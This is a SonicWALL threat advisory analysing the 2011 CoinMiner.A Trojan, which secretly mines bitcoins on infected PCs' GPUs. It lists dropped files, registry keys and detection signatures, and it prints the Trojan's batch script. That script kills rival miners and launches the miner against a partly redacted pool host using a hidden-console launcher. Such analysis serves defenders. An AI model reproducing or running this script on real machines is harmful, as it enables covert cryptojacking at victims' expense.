Back to SonicALERT
New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)
Description
The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.
The Trojan uses the following icon:
The Trojan adds the following files to the filesystem:
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
- C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]
hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:
wuT2.exe uses the following icon:
3kal.cmd contains the following data:
taskkill /f /im cgminer.exe
taskkill /f /im svchoost.exe
taskkill /f /im mamatije.exe
taskkill /f /im mamatije2.exe
taskkill /f /im mamatije3.exe
taskkill /f /im yaaa3.2.exe
taskkill /f /im WinMine.exe
taskkill /f /im mamatije4.exe
mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2
The Trojan adds the following keys to the Windows registry:
- HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Start Menu\Programs\Startup "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
- HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Local Settings\Temp\acc "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"
The Trojan attemps to open the following files:
- C:\Documents and Settings\{USER}\Start menu\Programs\Startup\start.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
- C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe
The Trojan uses hsbca.exe (Hidden Start) to run "3kal.cmd" via the following command:
C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"
The Trojan runs the following command to ensure internet connectivity:
As defined in "3kal.cmd" the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:
- cgminer.exe
- svchoost.exe
- mamatije.exe
- mamatije2.exe
- mamatije3.exe
- yaaa3.2.exe
- WinMine.exe
- mamatije4.exe
Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: CoinMiner.A (Trojan)
- GAV: CoinMiner.A_2 (Trojan)
- GAV: CoinMiner.A_3 (Trojan)
Back to top
Back to SonicALERT